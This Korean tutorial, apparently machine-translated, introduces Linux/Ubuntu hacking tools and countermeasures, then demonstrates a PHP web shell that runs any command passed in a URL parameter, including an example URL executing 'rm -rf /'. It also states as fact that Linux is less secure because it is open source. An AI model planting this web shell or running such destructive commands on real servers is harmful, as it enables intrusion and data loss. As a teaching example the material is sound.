Linux OS 해킹: 해킹 Ubuntu (명령 튜토리얼)

리눅스는 가장 널리 사용되는 서버 운영 체제이며, 특히 웹 서버에서 그렇습니다. 오픈 소스입니다. 즉, 누구나 소스 코드에 액세스할 수 있습니다. 공격자가 소스 코드를 연구하여 취약점을 찾을 수 있기 때문에 다른 운영 체제에 비해 보안성이 낮습니다.. Linux for Hackers는 이러한 취약점을 악용하여 시스템에 대한 무단 액세스를 얻는 것에 관한 것입니다.

이 기사에서는 Linux가 무엇인지, 보안 취약점, 해킹에 대해 소개합니다. Ubuntu 그리고 당신이 취할 수 있는 대응책.

Linux에 대한 빠른 참고 사항

Linux는 오픈 소스 운영 체제입니다.. Redhat, Fedora 등 Linux 기반 운영 체제의 배포판은 다양합니다. Ubuntu, 등등. 다른 운영 체제와 달리 리눅스는 보안 측면에서 덜 안전합니다. 이는 소스 코드가 무료로 제공되기 때문에 취약점을 연구하고 오픈 소스가 아닌 다른 운영 체제에 비해 악용하기 쉽기 때문입니다. 리눅스는 서버, 데스크톱, 태블릿 또는 모바일 기기 운영 체제로 사용할 수 있습니다.

Linux 프로그램은 GUI 또는 명령을 사용하여 작동할 수 있습니다. Linux 명령은 다음과 같습니다. Kali Linux GUI를 사용하는 것보다 해킹이 더 효과적이고 효율적입니다. 그렇기 때문에 해킹을 위한 기본적인 리눅스 명령어를 알아두면 도움이 됩니다.

이 튜토리얼을 참조하세요 https://www.guru99.com/unix-linux-tutorial.html 시작하는 방법에 대해 Kali Linux 해킹.

리눅스 해킹 도구

  • 네서스– 이 도구는 다음 용도로 사용할 수 있습니다. Ubuntu 해킹, 스캔 구성 설정, 패치, 네트워크 등은 다음에서 찾을 수 있습니다. https://www.tenable.com/products/nessus
  • NMap. 이 도구는 서버에서 실행 중인 호스트와 이들이 활용하는 서비스를 모니터링하는 데 사용할 수 있습니다. 포트를 검색하는 데에도 사용할 수 있습니다. 다음에서 찾을 수 있습니다. https://nmap.org/
  • 사라 – SARA는 Security Auditor's Research Assistant의 약어입니다. 이름에서 알 수 있듯이 이 도구는 다음과 같은 위협에 대해 네트워크를 감사하는 데 사용할 수 있습니다. SQL 주입, XSS 등은 다음에서 찾을 수 있습니다. http://www-arc.com/sara/sara.html

위 목록은 완전한 것이 아닙니다. 사용할 수 있는 도구에 대한 아이디어를 제공합니다. Ubuntu 해킹 및 Linux 시스템 해킹.

리눅스 해킹을 방지하는 방법

리눅스 해킹은 운영 체제의 취약점을 이용합니다. 조직은 이러한 공격으로부터 자신을 보호하기 위해 다음 정책을 채택할 수 있습니다.

  • 패치 관리– 패치는 공격자가 시스템을 손상시키기 위해 악용하는 버그를 수정합니다. 좋은 패치 관리 정책은 시스템에 관련 패치를 지속적으로 적용하도록 보장합니다.
  • 적절한 OS 구성– 다른 익스플로잇은 서버 구성의 취약점을 이용합니다. 비활성 사용자 이름과 데몬은 비활성화해야 합니다. 애플리케이션에 대한 일반 비밀번호, 기본 사용자 이름 및 일부 포트 번호와 같은 기본 설정을 변경해야 합니다.
  • 침입 탐지 시스템– 이러한 도구는 시스템에 대한 무단 액세스를 탐지하는 데 사용될 수 있습니다. 일부 도구에는 이러한 공격을 탐지하고 방지하는 기능이 있습니다.

해킹 활동: 해킹 Ubuntu PHP를 사용하는 리눅스 시스템

이 실제 시나리오에서는 다음을 사용하여 해킹하는 방법을 배웁니다. Ubuntu 그리고 우리는 귀하가 어떻게 사용할 수 있는지에 대한 기본 정보를 제공할 것입니다. PHP Linux를 손상시킵니다. 우리는 피해자를 표적으로 삼지 않을 것입니다. 사용해 보고 싶다면 로컬 컴퓨터에 LAMPP를 설치할 수 있습니다.

PHP에는 Linux 해킹 명령을 실행하는 데 사용할 수 있는 두 가지 기능이 있습니다. exec() 및 shell_exec() 함수가 있습니다. exec() 함수는 명령 출력의 마지막 줄을 반환하는 반면, shell_exec()는 명령의 전체 결과를 문자열로 반환합니다.

데모 목적으로, 공격자가 웹 서버에 다음 파일을 업로드한다고 가정해 보겠습니다.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

이리,

위 스크립트는 cmd라는 GET 변수에서 명령을 가져옵니다. 명령은 shell_exec()를 사용하여 실행되며 결과는 브라우저에 반환됩니다.

위 코드는 다음 URL을 사용하여 악용될 수 있습니다.

http://localhost/cp/konsole.php?cmd=ls%20-l

이리,

  • "...konsole.php?cmd=ls%20-l"ls –l 값을 cmd 변수에 할당합니다..

의 명령 Ubuntu 서버에 대한 해킹은 다음과 같이 실행됩니다.

shell_exec('ls -l') ;

위 코드를 웹 서버에서 실행하면 다음과 비슷한 결과가 나옵니다.

해킹하다 Ubuntu PHP를 사용하는 리눅스 시스템

위 명령은 단순히 현재 디렉터리의 파일과 권한을 표시합니다.

공격자가 다음 명령을 전달한다고 가정해 보자.

rm -rf /

이리,

  • "rm"은 파일을 제거합니다
  • "rf"는 rm 명령이 재귀 모드로 실행되도록 합니다. 모든 폴더 및 파일 삭제
  • "/"는 명령에 루트 디렉터리에서 파일 삭제를 시작하도록 지시합니다.

공격 URL은 다음과 같습니다.

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

요약

  • Linux는 서버, 데스크톱, 태블릿, 모바일 기기에 널리 사용되는 운영 체제입니다.
  • Linux 오픈 소스이므로 누구나 소스 코드를 얻을 수 있습니다. 이를 통해 취약점을 쉽게 발견할 수 있습니다. 해커를 위한 최고의 OS 중 하나입니다.
  • 기본 및 네트워킹 해킹 명령 Ubuntu Linux 해커에게 가치가 있습니다.
  • 취약점은 시스템을 손상시키는 데 악용될 수 있는 약점입니다.
  • 우수한 보안은 공격자에 의해 시스템이 손상되지 않도록 보호하는 데 도움이 될 수 있습니다.